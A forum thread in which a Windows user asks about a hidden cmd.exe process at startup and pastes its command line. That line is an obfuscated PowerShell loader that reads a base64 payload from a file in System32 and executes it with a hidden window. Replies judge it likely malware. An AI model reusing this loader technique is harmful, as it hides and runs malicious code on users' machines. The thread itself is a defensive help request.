Jump to content
Search In
  • More options...
Find results that contain...
Find results in...

Unknown CMD file running

Clintos
 Share

Hi guys, I have a cmd.exe that is always on when I start my computer. I can't find anything in task scheduler or autorun (to check up startup items) that opens it.

 

cmd.exe /c echo iex "`$b=[IO.File]::ReadAllBytes('C:\WINDOWS\System32\5fcxiwjk.cqe');`$s=[Text.Encoding]::UTF8.GetString(`$b, 444771, 1200);Invoke-Command -ScriptBlock ([ScriptBlock]::Create([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(`$s))))" | powershell.exe -WindowStyle Hidden

 

This is what i get from process explorer from it. Does anyone know what this could be or where it could be from? I've run malwarebyte and it's come up clean.

 

Cheers

Link to comment
Share on other sites

Link to post
Share on other sites

Do you have the SHA256 or MD5 hash of the 5fc file, or even a copy of the contents?

 

I have a feeling this is some sort of ware, but it wouldn't surprise me if its some garbage your motherboard manufacture has installed if you're using any of their software

Link to comment
Share on other sites

Link to post
Share on other sites

Very likely malware with a filename like that and being deobfuscated before being passed to powershell.

F@H
Desktop: i7-5960X 4.4GHz, Noctua NH-D14, ASUS Rampage V, 32GB, RTX3080, 2TB SX8200Pro, 2x16TB Ironwolf RAID0, Corsair HX1200, Thermaltake Overseer RX1, Samsung 4K curved 49" TV, 23" secondary, Mountain Everest Max

Mobile SFF rig: i9-9900K, Noctua NH-L9i, Asrock Z390 Phantom ITX-AC, 32GB, GTX1070, 2x1TB SX8200Pro RAID0, 2x5TB 2.5" HDD RAID0, Athena 500W Flex (Noctua fan), Custom 4.7l 3D printed case

 

Asus Zenbook UM325UA, Ryzen 7 5700u, 16GB, 1TB, OLED

 

GPD Win 2

Link to comment
Share on other sites

Link to post
Share on other sites

Windows 10, I've got rid of that file and the scripts are gone. I've run malwarebytes/windows defender. Is there anything else i can run to sweep my computer?

Link to comment
Share on other sites

Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share


×